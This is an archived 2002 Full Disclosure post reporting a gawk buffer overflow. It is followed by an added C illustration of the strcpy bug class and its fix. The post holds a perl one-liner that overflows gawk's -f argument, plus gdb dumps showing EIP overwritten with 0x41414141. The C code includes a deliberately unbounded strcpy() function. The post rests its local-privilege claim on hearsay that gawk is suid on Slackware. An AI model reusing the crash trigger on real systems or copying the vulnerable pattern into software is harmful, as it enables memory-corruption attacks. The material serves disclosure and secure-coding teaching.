Full Disclosure mailing list archives
[ElectronicSouls] - Gawk Overflow
From: es () hush com
Date: Thu, 28 Nov 2002 22:50:18 -0800
-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We have extensively researched this problem in Gawk, and now have deemed it to be a security hole. Details follow.

# cat ESgawk.txt

<-----]research!!![----->

Electronic Souls > Security Bug
@!%^#%!^&#%@!(*#$@)($)*@(&$@(*$&@@$^&$#@

vux[ES] & gnome_ present:

/bin/gawk, /usr/bin/gawk local buffer overflow !!

I have information (from gnome_) that the gawk program is suid on Slackware Linux.

--> RedHat Linux 6.2 testing:

[pom@myst pom]$ gdb /bin/gawk core
GNU gdb 4.17.0.11 with Linux support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
Core was generated by `gawk -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 6, Aborted.
Reading symbols from /lib/libm.so.6...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x40054d21 in __kill ()
(gdb) i r
eax: 0x0 0
ecx: 0x6 6
edx: 0x401261cc 1074946508
ebx: 0xa23 2595
esp: 0xbfffae9c -1073762660
ebp: 0xbfffaeac -1073762644
esi: 0xbfffb0f3 -1073762061
edi: 0xbfffaec4 -1073762620
eip: 0x40054d21 1074089249
eflags: 0x207 IOPL: 0; flags: CF PF IF
orig_eax: 0x25 37
cs: 0x23 35
ss: 0x2b 43
ds: 0x2b 43
es: 0x2b 43
fs: 0x2b 43
gs: 0x2b 43
(gdb) r -f `perl -e'print "A"x8543'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`

Program received signal SIGSEGV, Segmentation fault.
strcpy (dest=0xbfffb123 'A' <repeats 200 times>..., src=0x41414141 <Address 0x41414141 out of bounds>) at ../sysdeps/generic/strcpy.c:37
../sysdeps/generic/strcpy.c:37: No such file or directory.
(gdb) i r
eax: 0x7ebe6fe2 2126409698
ecx: 0x7ebe6fe1 2126409697
edx: 0x41414141 1094795585
ebx: 0xbfffb123 -1073762013
esp: 0xbfffb0f4 -1073762060
ebp: 0xbfffb0f8 -1073762056
esi: 0xbfffb123 -1073762013
edi: 0xbfffb114 -1073762028
eip: 0x400947a1 1074349985
eflags: 0x10a06 IOPL: 0; flags: PF IF OF RF
orig_eax: 0xffffffff -1
cs: 0x23 35
ss: 0x2b 43
ds: 0x2b 43
es: 0x2b 43
fs: 0x0 0
gs: 0x0 0

--> PhatLinux testing:

(gdb)
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
(gdb) r -f `perl -e'print "A"x8543'`
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax 0xffffffff -1
ecx 0x24 36
edx 0x24 36
ebx 0xfffffffa -6
esp 0xbfffd174 0xbfffd174
ebp 0x0 0x0
esi 0x0 0
edi 0x0 0
eip 0x41414141 0x41414141
eflags 0x10282 66178
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb)

h4h4 - (c) 2002 vux //fEAr!

greetz to: gnome_, Brain Storm[ES] & ES-team.
fuckz to : Nia*[ES], CraigTM[ES].

# Be sure to patch immediately.

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"People get drunk drinking alcohol."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nDjoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltjwwAoI24zPTruD5h
T9FPXknQE8zEBkuTAJ4w47RIT3fk0+Gb11sGT726yWW70w==
=SplS
-----END PGP SIGNATURE-----
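The post above reports only the crash: an 8543-byte `-f` argument makes gawk fault inside strcpy() and, on the second system, land with EIP = 0x41414141. The following is an added illustration, not code from the post or from gawk itself, of the bug class that crash pattern points to (an unbounded strcpy() of an argument into a fixed-size stack buffer), shown beside the length-checked form a patch would use, plus the two checks a triager actually runs on such a dump: does the payload fit, and is the faulting address made of the fill byte. The buffer size PATHBUF and the function names vuln_load_source, safe_load_source, make_payload, payload_rejected and addr_is_fill are assumptions for this example; gawk's real buffer and code paths are not known from the post.

```c
/* Added example: not gawk's code. Models the strcpy()-into-stack-buffer
 * pattern suggested by the crash dumps in the post. PATHBUF is an assumed
 * size; the real buffer in gawk is unknown. */
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PATHBUF 256   /* assumed buffer size for illustration */

/* Vulnerable pattern: the -f argument is copied with strcpy() into a fixed
 * stack buffer with no length check. An argument of PATHBUF bytes or more
 * runs past the buffer and, on x86, over the saved EBP and return address;
 * an all-'A' argument leaves 0x41414141 in EIP when the function returns,
 * which is what the PhatLinux dump shows. Kept only for contrast; it is
 * never called with untrusted input here. */
int vuln_load_source(const char *arg)
{
    char path[PATHBUF];
    strcpy(path, arg);                  /* no bound on strlen(arg) */
    return (int)strlen(path);
}

/* Hardened form: check the length first and refuse anything that does not
 * fit, including the terminating NUL. Returns 0 on success, -1 with
 * errno = ENAMETOOLONG when the argument is too long; `out` is untouched
 * on failure. */
int safe_load_source(const char *arg, char *out, size_t outsz)
{
    size_t n = strlen(arg);
    if (outsz == 0 || n >= outsz) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(out, arg, n + 1);
    return 0;
}

/* Build the same payload the post builds with perl -e 'print "A"x8543':
 * `len` copies of `fill`, NUL-terminated. Caller frees the result. */
char *make_payload(size_t len, unsigned char fill)
{
    char *p = malloc(len + 1);
    if (p == NULL)
        return NULL;
    memset(p, fill, len);
    p[len] = '\0';
    return p;
}

/* Returns 1 if the hardened loader rejects a `len`-byte 'A' argument,
 * 0 if it accepts it, -1 on allocation failure. */
int payload_rejected(size_t len)
{
    char buf[PATHBUF];
    char *p = make_payload(len, 'A');
    if (p == NULL)
        return -1;
    int rc = safe_load_source(p, buf, sizeof buf);
    free(p);
    return rc == -1 ? 1 : 0;
}

/* Crash-dump triage: a 32-bit fault address whose every byte equals the
 * fill byte (0x41414141 for 'A') means the payload itself reached the
 * register, i.e. a saved return address or pointer was overwritten.
 * An address inside libc such as 0x400947a1 does not match. */
int addr_is_fill(uint32_t addr, unsigned char fill)
{
    for (int i = 0; i < 4; i++) {
        if (((addr >> (8 * i)) & 0xffu) != fill)
            return 0;
    }
    return 1;
}

int main(int argc, char **argv)
{
    size_t len = argc > 1 ? strtoul(argv[1], NULL, 10) : 8543;
    int rej = payload_rejected(len);
    printf("%zu-byte -f argument: %s\n", len,
           rej == 1 ? "rejected (ENAMETOOLONG)" : rej == 0 ? "accepted" : "alloc failed");
    printf("EIP 0x41414141 is all 'A' bytes: %d\n", addr_is_fill(0x41414141u, 'A'));
    printf("EIP 0x400947a1 is all 'A' bytes: %d\n", addr_is_fill(0x400947a1u, 'A'));
    return 0;
}
```

Run with no arguments to replay the post's 8543-byte case against the hardened loader, or pass a length to find where the assumed PATHBUF boundary sits. The check in safe_load_source is the whole fix for this bug class: the copy is only performed after the source length has been compared with the destination size, so the buffer can never be overrun regardless of what argv carries.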